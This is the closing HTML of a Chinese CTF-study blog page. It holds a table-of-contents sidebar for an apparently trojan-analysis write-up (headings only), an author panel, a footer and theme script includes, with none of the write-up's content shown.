href="#%E6%9C%80%E7%BB%88%E5%88%A4%E6%96%AD"><span class="nav-number">1.1.4.</span> <span class="nav-text">最终判断</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E8%A7%A3"><span class="nav-number">1.2.</span> <span class="nav-text">题解</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#First-and-all"><span class="nav-number">1.2.1.</span> <span class="nav-text">First and all</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9B%9E%E7%8E%AFIP"><span class="nav-number">1.2.2.</span> <span class="nav-text">回环IP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%A8%E9%A9%AC%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.3.</span> <span class="nav-text">木马文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%A8%E9%A9%AC%E5%8A%A0%E8%BD%BD%E8%80%85"><span class="nav-number">1.2.4.</span> <span class="nav-text">木马加载者</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9B%9E%E7%8E%AF"><span class="nav-number">1.2.5.</span> <span class="nav-text">回环</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8A%A0%E5%AF%86%E7%A7%98%E9%92%A5"><span class="nav-number">1.2.6.</span> <span class="nav-text">加密秘钥</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#end1"><span class="nav-number">1.2.7.</span> <span class="nav-text">end1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#end2"><span class="nav-number">1.2.8.</span> <span class="nav-text">end2</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="CTF-DUAN"
      src="https://cdn.jsdelivr.net/gh/F0T0ne/Image/logo.jpg">
  <p class="site-author-name" itemprop="name">CTF-DUAN</p>
  <div class="site-description" itemprop="description">CTF学习</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">16</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">CTF-DUAN</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>  -->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
